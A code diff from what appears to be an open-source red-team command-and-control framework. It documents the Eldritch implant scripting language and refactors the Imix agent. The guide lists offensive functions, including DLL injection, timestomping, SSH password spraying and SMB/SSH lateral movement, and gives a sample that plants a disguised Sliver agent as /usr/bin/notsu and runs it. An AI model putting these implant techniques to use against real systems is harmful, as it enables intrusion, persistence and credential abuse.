diff --git a/.github/workflows/tests.yml b/.github/workflows/tests.yml index 1e4b5716b..8c5e2480b 100644 --- a/.github/workflows/tests.yml +++ b/.github/workflows/tests.yml @@ -34,6 +34,7 @@ jobs: uses: codecov/codecov-action@v3 implants: runs-on: ${{ matrix.os }} + timeout-minutes: 30 strategy: matrix: os: @@ -63,4 +64,4 @@ jobs: - name: 🔎 Run tests run: cd ./implants/ && cargo llvm-cov nextest --lcov --output-path lcov.info - name: 📶 Upload Coverage Results - uses: codecov/codecov-action@v3 \ No newline at end of file + uses: codecov/codecov-action@v3 diff --git a/docs/_data/toc.yml b/docs/_data/toc.yml index e3f628ff3..99d249c39 100644 --- a/docs/_data/toc.yml +++ b/docs/_data/toc.yml @@ -10,6 +10,8 @@ children: - title: Standard Library url: "user-guide/eldritch#standard-library" + - title: "Golem" + url: "user-guide/golem" - title: Developer Guide url: dev-guide links: diff --git a/docs/_docs/user-guide/eldritch.md b/docs/_docs/user-guide/eldritch.md index 5b2d03537..821fc94f5 100644 --- a/docs/_docs/user-guide/eldritch.md +++ b/docs/_docs/user-guide/eldritch.md @@ -1,12 +1,17 @@ --- title: Eldritch -tags: +tags: - User Guide description: Eldritch User Guide permalink: user-guide/eldritch --- # Overview -![/assets/img/coming-soon.gif](/assets/img/coming-soon.gif) +Eldritch is a pythonic red team Domain Specific Language (DSL) based on [starlark](https://github.com/facebookexperimental/starlark-rust). + +Eldritch is a small interpreter that can be embedded into a c2 agent as it is with Golem and Imix. +By embedding the interpreter into the agent conditional logic can be quickly evaluated without requiring multiple callbacks. + +Eldritch is currently under active development to help delineate methods in development the description contains the phrase `X method will`. ## Data types Eldritch currently only supports the [default starlark data types.](https://github.com/facebookexperimental/starlark-rust/blob/main/docs/types.md) @@ -17,30 +22,84 @@ Eldritch doesn't implement any form of error handling. If a function fails it wi If you're using a functions that has a chance to error (functions that do file / network IO) test preemptively with function like `is_file`, `is_dir`, `is_windows`, etc. For example: -```Python -if is_linux(): - if is_file("/etc/passwd"): - file.read("/etc/passwd") +```python +def read_passwd(): + if is_linux(): + if is_file("/etc/passwd"): + file.read("/etc/passwd") +read_passwd() +``` + +```python +def write_systemd_service(): + if is_linux(): + if is_dir("/lib/systemd/system/"): + service_args = { + "name":"my-service", + "desc":"A test", + "binary_path":"/bin/false", + } + assets.copy("systemd-template.j2", "/tmp/systemd-template.j2") + file.template("/tmp/systemd-template.j2","/lib/systemd/system/myservice.service",args,False) + file.remove("/tmp/systemd-template.j2") + +write_systemd_service() ``` # Standard Library -The Standard Library is very cool, and will be even cooler when Nick documents it. +The standard library is the default functionality that eldritch provides. -### file.append -`file.append(path: str, content: str) -> None` +It currently contains five modules: +- `assets` - Used to interact with files stored natively in the agent. +- `file` - Used to interact with files on the system. +- `pivot` - Used to identify and move between systems. +- `process` - Used to interact with processes on the system. +- `sys` - General system capabilities can include loading libraries, or information about the current context. -The file.append Append content str to file at path. If no file exists at path create the file with the contents content. +Functions fall into one of these five modules. This is done to improve clarity about function use. -### file.copy -`file.copy(src: str, dst: str) -> None` +--- + +## Assets +### assets.copy +`assets.copy(src: str, dst: str) -> None` + +The assets.copy method copies an embedded file from the agent to disk. +The `srt` variable will be the path from the `embed_files_golem_prod` as the root dir. +For example `embed_files_golem_prod/sliver/agent-x64` can be referenced as `sliver/agent-x64`. +If `dst` exists it will be overwritten. If it doesn't exist the function will fail. -The file.copy copies a file from src path to dst path. If dst file doesn't exist it will be created. +```python +def deploy_agent(): + if file.is_dir("/usr/bin"): + assets.copy("sliver/agent-x64","/usr/bin/notsu") + sys.exec("/usr/bin/notsu",[],true) +deploy_agent() +``` + +### assets.list +`assets.list() -> List` + +The assets.list method returns a list of asset names that the agent is aware of. + +--- + +## File +### file.append +`file.append(path: str, content: str) -> None` + +The file.append method appends the `content` to file at `path`. If no file exists at path create the file with the contents content. ### file.compress `file.compress(src: str, dst: str) -> None` -The file.compress function compresses a file using the gzip algorithm. If the destination file doesn't exist it will be created. If the source file doesn't exist an error will be thrown. If the source path is a directory the contents will be placed in a tar archive and then compressed. +The file.compress method compresses a file using the gzip algorithm. If the destination file doesn't exist it will be created. If the source file doesn't exist an error will be thrown. If the source path is a directory the contents will be placed in a tar archive and then compressed. + +### file.copy +`file.copy(src: str, dst: str) -> None` + +The file.copy method copies a file from `src` path to `dst` path. If `dst` file doesn't exist it will be created. ### file.download `file.download(uri: str, dst: str) -> None` @@ -50,28 +109,33 @@ The file.download method downloads a file at the URI specified in `uri` t ### file.exists `file.exists(path: str) -> bool` -The file.exists checks if a file or directory exists at the path specified. +The file.exists method checks if a file or directory exists at the path specified. ### file.hash `file.hash(path: str) -> str` -The file.hash takes a sha256 hash of the file specified in path. +The file.hash method returns a sha256 hash of the file specified in `path`. ### file.is_dir `file.is_dir(path: str) -> bool` -The file.is_dir checks if a path exists and is a directory. If it doesn't exist or is not a directory it will return false. +The file.is_dir method checks if a path exists and is a directory. If it doesn't exist or is not a directory it will return `False`. ### file.is_file `file.is_file(path: str) -> bool` -The file.is_file checks if a path exists and is a file. If it doesn't exist or is not a file it will return false. +The file.is_file method checks if a path exists and is a file. If it doesn't exist or is not a file it will return `False`. ### file.mkdir `file.mkdir(path: str) -> None` The file.mkdir method is very cool, and will be even cooler when Nick documents it. +### file.moveto +`file.moveto(src: str, dst: str) -> None` + +The file.moveto method moves a file or directory from src to `dst`. If the `dst` directory or file exists it will be deleted before being replaced to ensure consistency across systems. + ### file.read `file.read(path: str) -> str` @@ -80,12 +144,7 @@ The file.read method will read the contents of a file. If the file or dir ### file.remove `file.remove(path: str) -> None` -The file.remove method will delete a file or directory (and it's contents) specified by path. - -### file.moveto -`file.moveto(src: str, dst: str) -> None` - -The file.moveto method will move a file or directory from src to dst. If the dst directory or file exists it will be deleted before being replaced. To ensure consistency across systems. +The file.remove method deletes a file or directory (and it's contents) specified by path. ### file.replace `file.replace(path: str, pattern: str, value: str) -> None` @@ -96,6 +155,14 @@ The file.replace method is very cool, and will be even cooler when Nick d The file.replace_all method finds all strings matching a regex pattern in the specified file and replaces them with the value. +### file.template +`file.template(template_path: str, dst: str, args: Dict, autoescape: bool) -> None` + +The file.template method reads a Jinja2 template file from disk, fill in the variables using `args` and then write it to the destination specified. +If the destination file doesn't exist it will be created (if the parent directory exists). If the destination file does exist it will be overwritten. +The `args` dictionary currently supports values of: `int`, `str`, and `List`. +`autoescape` when `True` will perform HTML character escapes according to the [OWASP XSS guidelines](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html) + ### file.timestomp `file.timestomp(src: str, dst: str) -> None` @@ -106,15 +173,92 @@ The file.timestomp method is very cool, and will be even cooler when Nick The file.write method is very cool, and will be even cooler when Nick documents it. +--- + +## Pivot +### pivot.arp_scan +`pivot.arp_scan(target_cidrs: List) -> List` + +The pivot.arp_scan method is being proposed to allow users to enumerate hosts on their network without using TCP connect or ping. + +### pivot.bind_proxy +`pivot.bind_proxy(listen_address: str, listen_port: int, username: str, password: str ) -> None` + +The pivot.bind_proxy method is being proposed to provide users another option when trying to connect and pivot within an environment. This function will start a SOCKS5 proxy on the specified port and interface, with the specified username and password (if provided). + +### pivot.ncat +`pivot.ncat(address: str, port: int, data: str, protocol: str ) -> str` + +The pivot.ncat method allows a user to send arbitrary data over TCP/UDP to a host. If the server responds that response will be returned. + +`protocol` must be `tcp`, or `udp` anything else will return an error `Protocol not supported please use: udp or tcp.`. + +### pivot.port_scan +`pivot.port_scan(target_cidrs: List, ports: List, protocol: str, timeout: int) -> List` + +The pivot.port_scan method allows users to scan TCP/UDP ports within the eldritch language. +Inputs: +- `target_cidrs` must be in a CIDR format eg. `127.0.0.1/32`. Domains and single IPs `example.com` / `127.0.0.1` cannot be passed. +- `ports` can be a list of any number of integers between 1 and 65535. +- `protocol` must be: `tcp` or `udp`. These are the only supported options. +- `timeout` is the number of seconds a scan will wait without a response before it's marked as `timeout` + +Results will be in the format: + +```JSON +[ + { "ip": "127.0.0.1", "port": 22, "protocol": "tcp", "status": "open"}, + { "ip": "127.0.0.1", "port": 21, "protocol": "tcp", "status": "closed"}, + { "ip": "127.0.0.1", "port": 80, "protocol": "tcp", "status": "timeout"}, +] +``` + +A ports status can be open, closed, or timeout: + +|**State**|**Protocol**| **Meaning** | +|---------|------------|------------------------------------------------------| +| open | tcp | Connection successful. | +| close | tcp | Connection refused. | +| timeout | tcp | Connection dropped or didn't respond. | +| open | udp | Connection returned some data. | +| timeout | udp | Connection was refused, dropped, or didn't respond. | + +Each IP in the specified CIDR will be returned regardless of if it returns any open ports. +Be mindful of this when scanning large CIDRs as it may create largo return objects. + +NOTE: Windows scans against `localhost`/`127.0.0.1` can behave unexpectedly or even treat the action as malicious. Eg. scanning ports 1-65535 against windows localhost may cause the stack to overflow or process to hang indefinitely. + +### pivot.port_forward +`pivot.port_forward(listen_address: str, listen_port: int, forward_address: str, forward_port: int, str: protocol ) -> None` + +The pivot.port_forward method is being proposed to provide socat like functionality by forwarding traffic from a port on a local machine to a port on a different machine allowing traffic to be relayed. + +### pivot.smb_exec +`pivot.smb_exec(target: str, port: int, username: str, password: str, hash: str, command: str) -> str` + +The pivot.smb_exec method is being proposed to allow users a way to move between hosts running smb. + +### pivot.ssh_exec +`pivot.ssh_exec(target: str, port: int, username: str, password: str, key: str, command: str, shell_path: str) -> List` + +The pivot.ssh_exec method is being proposed to allow users a way to move between hosts running ssh. + +### pivot.ssh_password_spray +`pivot.ssh_password_spray(targets: List, port: int, credentials: List, keys: List, command: str, shell_path: str) -> List` + +The pivot.ssh_password_spray method is being proposed to allow users a way to test found credentials against neighboring targets. It will iterate over the targets list and try each credential set. Credentials will be a formatted list of usernames and passwords Eg. "username:password". The function will return a formatted list of "target:username:password". command and shell_path is intended to give more flexibility but may be adding complexity. + +## Process ### process.kill `process.kill(pid: int) -> None` -The process.kill will kill a process using the KILL signal given its process id. +The process.kill method will kill a process using the KILL signal given its process id. ### process.list `process.list() -> List` -The process.list method will return a list of dictionarys that describe each process. The dictionaries follow the schema: +The process.list method returns a list of dictionaries that describe each process. The dictionaries follow the schema: + ```json { "pid": "9812", @@ -134,6 +278,7 @@ The process.list method will return a list of dictionarys that describe e The process.name method is very cool, and will be even cooler when Nick documents it. +## Sys ### sys.dll_inject `sys.dll_inject(dll_path: str, pid: int) -> None` @@ -166,12 +311,7 @@ sys.execute("/bin/bash",["-c", "ls /nofile"]) ### sys.is_linux `sys.is_linux() -> bool` -The sys.is_linux method returns true if on a linux system and fales on everything else. - -### sys.is_windows -`sys.is_windows() -> bool` - -The sys.is_windows method returns true if on a windows system and fales on everything else. +The sys.is_linux method returns `True` if on a linux system and `False` on everything else. ### sys.is_macos `sys.is_macos() -> bool` @@ -217,49 +357,13 @@ The pivot.smb_exec method is being proposed to allow users a way to move ### pivot.port_scan `pivot.port_scan(target_cidrs: List, ports: List, protocol: str, timeout: int) -> List` -The pivot.port_scan method allows users to scan TCP/UDP ports within the eldritch language. -Inputs: -- `target_cidrs` must be in a CIDR format eg. `127.0.0.1/32`. Domains and single IPs `example.com` / `127.0.0.1` cannot be passed. -- `ports` can be a list of any number of integers between 1 and 65535. -- `protocol` must be: `tcp` or `udp`. These are the only supported options. -- `timeout` is the number of seconds a scan will wait without a response before it's marked as `timeout` - -Results will be in the format: -```JSON -[ - { "ip": "127.0.0.1", "port": 22, "protocol": "tcp", "status": "open"}, - { "ip": "127.0.0.1", "port": 21, "protocol": "tcp", "status": "closed"}, - { "ip": "127.0.0.1", "port": 80, "protocol": "tcp", "status": "timeout"}, -] -``` -A ports status can be open, closed, or timeout: -|**State**|**Protocol**| **Meaning** | -|---------|------------|------------------------------------------------------| -| open | tcp | Connection successful. | -| close | tcp | Connection refused. | -| timeout | udp | Connection was refused, dropped, or didn't respond | - -Each IP in the specified CIDR will be returned regardless of if it returns any open ports. -Be mindful of this when scanning large CIDRs as it may create largo return objects. - -NOTE: Windows scans against `localhost`/`127.0.0.1` can behave unexpectedly or even treat the action as malicious. Eg. scanning ports 1-65535 against windows localhost may cause the stack to overflow or process to hang indefinitely. - -### pivot.arp_scan -`pivot.arp_scan(target_cidrs: List) -> List` - -The pivot.arp_scan method is being proposed to allow users to enumerate hosts on their network without using TCP connect or ping. - -### pivot.port_forward -`pivot.port_forward(listen_address: str, listen_port: int, forward_address: str, forward_port: int, str: portocol ) -> None` - -The pivot.port_forward method is being proposed to providde socat like functionality by forwarding traffic from a port on a local machine to a port on a different machine allowing traffic to be relayed. +### sys.is_windows +`sys.is_windows() -> bool` -### pivot.ncat -`pivot.ncat(address: str, port: int, data: str, str: portocol ) -> str` +The sys.is_windows method returns `True` if on a windows system and `False` on everything else. -The pivot.ncat method allows a user to send arbitrary data over TCP/UDP to a host. If the server responds that response will be returned. +### sys.shell +`sys.shell(cmd: str) -> str` -### pivot.bind_proxy -`pivot.bind_proxy(listen_address: str, listen_port: int, username: str, password: str ) -> None` +The sys.shell method takes a string and runs it in a native interpreter. On MacOS, Linux, and *nix/bsd systems this is `/bin/bash -c `. On Windows this is `cmd /C `. Stdout from the process will be returned. If your command errors the error will be ignored and not passed back to you. -The pivot.bind_proxy method is being proposed to provide users another option when trying to connect and pivot within an environment. This function will start a SOCKS5 proxy on the specificed port and interface, with the specificed username and password (if provided). diff --git a/docs/_docs/user-guide/tavern.md b/docs/_docs/user-guide/tavern.md index 136c8662f..1f8c120f0 100644 --- a/docs/_docs/user-guide/tavern.md +++ b/docs/_docs/user-guide/tavern.md @@ -71,7 +71,7 @@ After installing the gcloud CLI, run `gcloud auth application-default login` to terraform apply -var="gcp_project=new-realm-deployment" -var="oauth_client_id=12345.apps.googleusercontent.com" -var="oauth_client_secret=ABCDEFG" -var="oauth_domain=test-tavern.redteam.toys" ``` -After terraform completes succesfully, head to the [DNS mappings for Cloud Run](https://console.cloud.google.com/run/domains) and wait for a certificate to successfully provision. This may take a while, so go enjoy a nice cup of coffee ☕ +After terraform completes successfully, head to the [DNS mappings for Cloud Run](https://console.cloud.google.com/run/domains) and wait for a certificate to successfully provision. This may take a while, so go enjoy a nice cup of coffee ☕ After your certificate has successfully provisioned, it may still take a while (e.g. an hour or two) before you are able to visit Tavern using your custom OAuth Domain (if configured). diff --git a/implants/eldritch/src/pivot.rs b/implants/eldritch/src/pivot.rs index 6b52e0f3b..232556cbb 100644 --- a/implants/eldritch/src/pivot.rs +++ b/implants/eldritch/src/pivot.rs @@ -67,22 +67,22 @@ fn methods(builder: &mut MethodsBuilder) { smb_exec_impl::smb_exec(target, port, username, password, hash, command) } // May want these too: PSRemoting, WMI, WinRM - fn port_scan<'v>(this: PivotLibrary, starlark_heap: &'v Heap, target_cidrs: Vec, ports: Vec, portocol: String, timeout: i32) -> anyhow::Result>> { + fn port_scan<'v>(this: PivotLibrary, starlark_heap: &'v Heap, target_cidrs: Vec, ports: Vec, protocol: String, timeout: i32) -> anyhow::Result>> { if false { println!("Ignore unused this var. _this isn't allowed by starlark. {:?}", this); } - port_scan_impl::port_scan(starlark_heap, target_cidrs, ports, portocol, timeout) + port_scan_impl::port_scan(starlark_heap, target_cidrs, ports, protocol, timeout) } fn arp_scan(this: PivotLibrary, target_cidrs: Vec) -> anyhow::Result> { if false { println!("Ignore unused this var. _this isn't allowed by starlark. {:?}", this); } arp_scan_impl::arp_scan(target_cidrs) } - fn port_forward(this: PivotLibrary, listen_address: String, listen_port: i32, forward_address: String, forward_port: i32, portocol: String) -> anyhow::Result { + fn port_forward(this: PivotLibrary, listen_address: String, listen_port: i32, forward_address: String, forward_port: i32, protocol: String) -> anyhow::Result { if false { println!("Ignore unused this var. _this isn't allowed by starlark. {:?}", this); } - port_forward_impl::port_forward(listen_address, listen_port, forward_address, forward_port, portocol)?; + port_forward_impl::port_forward(listen_address, listen_port, forward_address, forward_port, protocol)?; Ok(NoneType{}) } - fn ncat(this: PivotLibrary, address: String, port: i32, data: String, portocol: String) -> anyhow::Result { + fn ncat(this: PivotLibrary, address: String, port: i32, data: String, protocol: String) -> anyhow::Result { if false { println!("Ignore unused this var. _this isn't allowed by starlark. {:?}", this); } - ncat_impl::ncat(address, port, data, portocol) + ncat_impl::ncat(address, port, data, protocol) } // Seems to have the best protocol support - https://github.com/ajmwagar/merino fn bind_proxy(this: PivotLibrary, listen_address: String, listen_port: i32, username: String, password: String) -> anyhow::Result { diff --git a/implants/eldritch/src/pivot/port_forward_impl.rs b/implants/eldritch/src/pivot/port_forward_impl.rs index 5098543a8..10e215e99 100644 --- a/implants/eldritch/src/pivot/port_forward_impl.rs +++ b/implants/eldritch/src/pivot/port_forward_impl.rs @@ -1,5 +1,5 @@ use anyhow::Result; -pub fn port_forward(_listen_address: String, _listen_port: i32, _forward_address: String, _forward_port: i32, _portocol: String) -> Result<()> { +pub fn port_forward(_listen_address: String, _listen_port: i32, _forward_address: String, _forward_port: i32, _protocol: String) -> Result<()> { unimplemented!("Method unimplemented") } \ No newline at end of file diff --git a/implants/eldritch/src/pivot/port_scan_impl.rs b/implants/eldritch/src/pivot/port_scan_impl.rs index 385ccde94..2412a2921 100644 --- a/implants/eldritch/src/pivot/port_scan_impl.rs +++ b/implants/eldritch/src/pivot/port_scan_impl.rs @@ -336,8 +336,8 @@ async fn handle_port_scan(target_cidrs: Vec, ports: Vec, protocol: // ] // Non-async wrapper for our async scan. -pub fn port_scan(starlark_heap: &Heap, target_cidrs: Vec, ports: Vec, portocol: String, timeout: i32) -> Result> { - if portocol != TCP && portocol != UDP { +pub fn port_scan(starlark_heap: &Heap, target_cidrs: Vec, ports: Vec, protocol: String, timeout: i32) -> Result> { + if protocol != TCP && protocol != UDP { return Err(anyhow::anyhow!("Unsupported protocol. Use 'tcp' or 'udp'.")) } @@ -347,7 +347,7 @@ pub fn port_scan(starlark_heap: &Heap, target_cidrs: Vec, ports: Vec anyhow::Result<()> { tome_files_and_content.push( (tome_path, tome_contents) ) } - let runtime = tokio::runtime::Builder::new_current_thread() + let runtime = tokio::runtime::Builder::new_multi_thread() .enable_all() .build() .unwrap(); diff --git a/implants/imix/src/main.rs b/implants/imix/src/main.rs index d3108705f..c1836fbb3 100644 --- a/implants/imix/src/main.rs +++ b/implants/imix/src/main.rs @@ -50,13 +50,12 @@ async fn handle_exec_tome(task: GraphQLTask, print_channel_sender: Sender local_thread_res, Err(_) => todo!(), }; - + // let res = eldritch_run(tome_name, tome_contents, task_job.parameters, &print_handler); match res { Ok(tome_output) => Ok((tome_output, "".to_string())), Err(tome_error) => Ok(("".to_string(), tome_error.to_string())), @@ -69,7 +68,6 @@ async fn handle_exec_timeout_and_response(task: graphql::GraphQLTask, print_chan // Define a future for our execution task let exec_future = handle_exec_tome(task.clone(), print_channel_sender.clone()); - // Execute that future with a timeout defined by the timeout argument. let tome_result = match tokio::time::timeout(timeout_duration, exec_future).await { Ok(res) => { @@ -81,6 +79,10 @@ async fn handle_exec_timeout_and_response(task: graphql::GraphQLTask, print_chan Err(timer_elapsed) => ("".to_string(), format!("Time elapsed task {} has been running for {} seconds", task.id, timer_elapsed.to_string())), }; + // let tome_result = tokio::task::spawn(exec_future).await??; + // let tome_result = tokio::spawn(exec_future).await??; + + print_channel_sender.clone().send(format!("---[RESULT]----\n{}\n---------",tome_result.0))?; print_channel_sender.clone().send(format!("---[ERROR]----\n{}\n--------",tome_result.1))?; Ok(()) @@ -130,7 +132,7 @@ fn get_primary_ip() -> Result { } }, Err(e) => { - println!("Error getting primary ip address:\n{e}"); + eprintln!("Error getting primary ip address:\n{e}"); "DANGER-UNKNOWN".to_string() }, }; @@ -166,7 +168,7 @@ fn get_os_pretty_name() -> Result { // Async handler for port scanning. async fn main_loop(config_path: String, run_once: bool) -> Result<()> { - let debug = true; + let debug = false; let version_string = "v0.1.0"; let config_file = File::open(config_path)?; let imix_config: imix::Config = serde_json::from_reader(config_file)?; @@ -234,6 +236,7 @@ async fn main_loop(config_path: String, run_once: bool) -> Result<()> { }; loop { + let start_time = Utc::now().time(); // 0. Get loop start time let loop_start_time = Instant::now(); if debug { println!("Get new tasks"); } @@ -241,25 +244,25 @@ async fn main_loop(config_path: String, run_once: bool) -> Result<()> { // 1a) calculate callback uri let cur_callback_uri = imix_config.callback_config.c2_configs[0].uri.clone(); + if debug { println!("[{}]: collecting tasks", (Utc::now().time() - start_time).num_milliseconds()) } // 1b) Collect new tasks let new_tasks = match graphql::gql_claim_tasks(cur_callback_uri.clone(), claim_tasks_input.clone()).await { Ok(tasks) => tasks, Err(error) => { - if debug { - println!("main_loop: error claiming task\n{:?}", error) - } + if debug { println!("main_loop: error claiming task\n{:?}", error) } let empty_vec = vec![]; empty_vec }, }; - if debug { println!("Starting {} new tasks", new_tasks.len()); } + if debug { println!("[{}]: Starting {} new tasks", (Utc::now().time() - start_time).num_milliseconds(), new_tasks.len()); } // 2. Start new tasks for task in new_tasks { if debug { println!("Launching:\n{:?}", task.clone().job.unwrap().tome.eldritch); } let (sender, receiver) = channel::(); let exec_with_timeout = handle_exec_timeout_and_response(task.clone(), sender.clone()); + if debug { println!("[{}]: Queueing task {}", (Utc::now().time() - start_time).num_milliseconds(), task.clone().id); } match all_exec_futures.insert(task.clone().id, ExecTask{ future_join_handle: task::spawn(exec_with_timeout), start_time: Utc::now(), @@ -267,38 +270,40 @@ async fn main_loop(config_path: String, run_once: bool) -> Result<()> { print_reciever: receiver, }) { Some(_old_task) => { - if debug { - println!("main_loop: error adding new task. Non-unique taskID\n"); - } + if debug {println!("main_loop: error adding new task. Non-unique taskID\n");} }, - None => {}, // Task queued successfully + None => { + if debug {println!("main_loop: Task queued successfully\n");} + }, // Task queued successfully } + if debug { println!("[{}]: Queued task {}", (Utc::now().time() - start_time).num_milliseconds(), task.clone().id); } } - - if debug { println!("Sleeping"); } // 3. Sleep till callback time // time_to_wait - time_elapsed - let time_to_sleep = imix_config.callback_config.interval - loop_start_time.elapsed().as_secs() ; - tokio::time::sleep(std::time::Duration::new(time_to_sleep, 24601)).await; - + let time_to_sleep = imix_config.callback_config.interval - loop_start_time.elapsed().as_secs(); + if debug { println!("[{}]: Sleeping seconds {}", (Utc::now().time() - start_time).num_milliseconds(), time_to_sleep); } + // tokio::time::sleep(std::time::Duration::new(time_to_sleep, 24601)).await; // This seems to wait for other threads to finish. + std::thread::sleep(std::time::Duration::new(time_to_sleep, 24601)); // This just sleeps our thread. // :clap: :clap: make new map! let mut running_exec_futures: HashMap = HashMap::new(); - if debug { println!("Checking status"); } + if debug { println!("[{}]: Checking task status", (Utc::now().time() - start_time).num_milliseconds()); } // Check status & send response for exec_future in all_exec_futures.into_iter() { - if debug { - println!("{}: {:?}", exec_future.0, exec_future.1.future_join_handle.is_finished()); - } + if debug { println!("[{}]: Task # {} is_finished? {}", (Utc::now().time() - start_time).num_milliseconds(), exec_future.0, exec_future.1.future_join_handle.is_finished()); } let mut res: Vec = vec![]; + // Loop over each line of output from the task. loop { - if debug { println!("Reciveing output"); } + if debug { println!("[{}]: Task # {} recieving output", (Utc::now().time() - start_time).num_milliseconds(), exec_future.0); } let new_res_line = match exec_future.1.print_reciever.recv_timeout(Duration::from_millis(100)) { - Ok(local_res_string) => local_res_string, + Ok(local_res_string) => { + local_res_string + }, Err(local_err) => { match local_err.to_string().as_str() { "channel is empty and sending half is closed" => { break; }, + "timed out waiting on channel" => { break; }, _ => eprint!("Error: {}", local_err), } break; @@ -328,16 +333,14 @@ async fn main_loop(config_path: String, run_once: bool) -> Result<()> { } }, }; - if debug { - println!("{}", task_response.output); - } + if debug { println!("[{}]: Task {} output: {}", (Utc::now().time() - start_time).num_milliseconds(), exec_future.0, task_response.output); } let submit_task_result = graphql::gql_post_task_result(cur_callback_uri.clone(), task_response).await; let _ = match submit_task_result { Ok(_) => Ok(()), // Currently no reason to save the task since it's the task we just answered. Err(error) => Err(error), }; - // Only re-insert the runnine exec futures + // Only re-insert the runnine exec futures if !exec_future.1.future_join_handle.is_finished() { running_exec_futures.insert(exec_future.0, exec_future.1); } @@ -349,7 +352,6 @@ async fn main_loop(config_path: String, run_once: bool) -> Result<()> { } } - pub fn main() -> Result<(), imix::Error> { let matches = Command::new("imix") .arg( @@ -371,7 +373,7 @@ pub fn main() -> Result<(), imix::Error> { .get_matches(); - let runtime = tokio::runtime::Builder::new_current_thread() + let runtime = tokio::runtime::Builder::new_multi_thread() .enable_all() .build() .unwrap(); @@ -393,7 +395,7 @@ pub fn main() -> Result<(), imix::Error> { if let Some(config_path) = matches.value_of("config") { match runtime.block_on(main_loop(config_path.to_string(), false)) { Ok(_) => {}, - Err(error) => println!("Imix mail_loop exited unexpectedly with config: {}\n{}", config_path.to_string(), error), + Err(error) => eprintln!("Imix main_loop exited unexpectedly with config: {}\n{}", config_path.to_string(), error), } } Ok(()) @@ -414,7 +416,6 @@ mod tests { let primary_ip_address = match get_primary_ip() { Ok(local_primary_ip) => local_primary_ip, Err(local_error) => { - println!("An error occured during testing default_ip:{local_error}"); assert_eq!(false,true); "DANGER-UNKNOWN".to_string() }, @@ -425,7 +426,6 @@ mod tests { #[test] fn imix_test_get_os_pretty_name() { let res = get_os_pretty_name().unwrap(); - println!("{res}"); assert!(!res.contains("UNKNOWN")); } @@ -453,7 +453,7 @@ sys.shell(input_params["cmd"])["stdout"] }; - let runtime = tokio::runtime::Builder::new_current_thread() + let runtime = tokio::runtime::Builder::new_multi_thread() .enable_all() .build() .unwrap(); @@ -467,7 +467,6 @@ sys.shell(input_params["cmd"])["stdout"] let stdout = receiver.recv_timeout(Duration::from_millis(500)).unwrap(); assert_eq!(stdout, "custom_print_handler_test".to_string()); - println!("{:?}", result.clone()); let mut bool_res = false; if cfg!(target_os = "linux") || @@ -487,6 +486,65 @@ sys.shell(input_params["cmd"])["stdout"] } + + #[test] + fn imix_test_main_loop_sleep_twice_short() -> Result<()> { + // Response expectations are poped in reverse order. + let server = Server::run(); + server.expect( + Expectation::matching(all_of![ + request::method_path("POST", "/graphql"), + request::body(matches(".*ImixPostResult.*main_loop_test_success.*")) + ]) + .times(2) + .respond_with(status_code(200) + .body(r#"{"data":{"submitTaskResult":{"id":"17179869185"}}}"#)), + ); + server.expect( + Expectation::matching(all_of![ + request::method_path("POST", "/graphql"), + request::body(matches(".*claimTasks.*")) + ]) + .times(1) + .respond_with(status_code(200) + .body(r#"{"data":{"claimTasks":[{"id":"17179869185","job":{"id":"4294967297","name":"Sleep1","parameters":"{}","tome":{"id":"21474836482","name":"sleep","description":"sleep stuff","paramDefs":"{}","eldritch":"def test():\n if sys.is_macos():\n sys.shell(\"sleep 3\")\n if sys.is_linux():\n sys.shell(\"sleep 3\")\n if sys.is_windows():\n sys.shell(\"timeout 3\")\ntest()\nprint(\"main_loop_test_success\")","files":[]},"bundle":null}},{"id":"17179869186","job":{"id":"4294967298","name":"Sleep1","parameters":"{}","tome":{"id":"21474836483","name":"sleep","description":"sleep stuff","paramDefs":"{}","eldritch":"def test():\n if sys.is_macos():\n sys.shell(\"sleep 3\")\n if sys.is_linux():\n sys.shell(\"sleep 3\")\n if sys.is_windows():\n sys.shell(\"timeout 3\")\ntest()\nprint(\"main_loop_test_success\")","files":[]},"bundle":null}}]}}"#)), + ); + + let tmp_file_new = NamedTempFile::new()?; + let path_new = String::from(tmp_file_new.path().to_str().unwrap()).clone(); + let url = server.url("/graphql").to_string(); + let _ = std::fs::write(path_new.clone(),format!(r#"{{ + "service_configs": [], + "target_forward_connect_ip": "127.0.0.1", + "target_name": "test1234", + "callback_config": {{ + "interval": 4, + "jitter": 0, + "timeout": 4, + "c2_configs": [ + {{ + "priority": 1, + "uri": "{url}" + }} + ] + }} +}}"#)); + + let runtime = tokio::runtime::Builder::new_multi_thread() + .enable_all() + .build() + .unwrap(); + + // Define a future for our execution task + let start_time = Utc::now().time(); + let exec_future = main_loop(path_new, true); + let _result = runtime.block_on(exec_future).unwrap(); + let end_time = Utc::now().time(); + let diff = (end_time - start_time).num_milliseconds(); + assert!(diff < 4500); + Ok(()) + } + #[test] fn imix_test_main_loop_run_once() -> Result<()> { @@ -519,7 +577,7 @@ sys.shell(input_params["cmd"])["stdout"] "target_forward_connect_ip": "127.0.0.1", "target_name": "test1234", "callback_config": {{ - "interval": 8, + "interval": 4, "jitter": 1, "timeout": 4, "c2_configs": [ @@ -531,20 +589,18 @@ sys.shell(input_params["cmd"])["stdout"] }} }}"#)); - let runtime = tokio::runtime::Builder::new_current_thread() + let runtime = tokio::runtime::Builder::new_multi_thread() .enable_all() .build() .unwrap(); - // let (sender, receiver) = channel::(); - - // // Define a future for our execution task - // let exec_future = handle_exec_tome(test_tome_input, sender.clone()) let exec_future = main_loop(path_new, true); let _result = runtime.block_on(exec_future).unwrap(); assert!(true); Ok(()) } + + }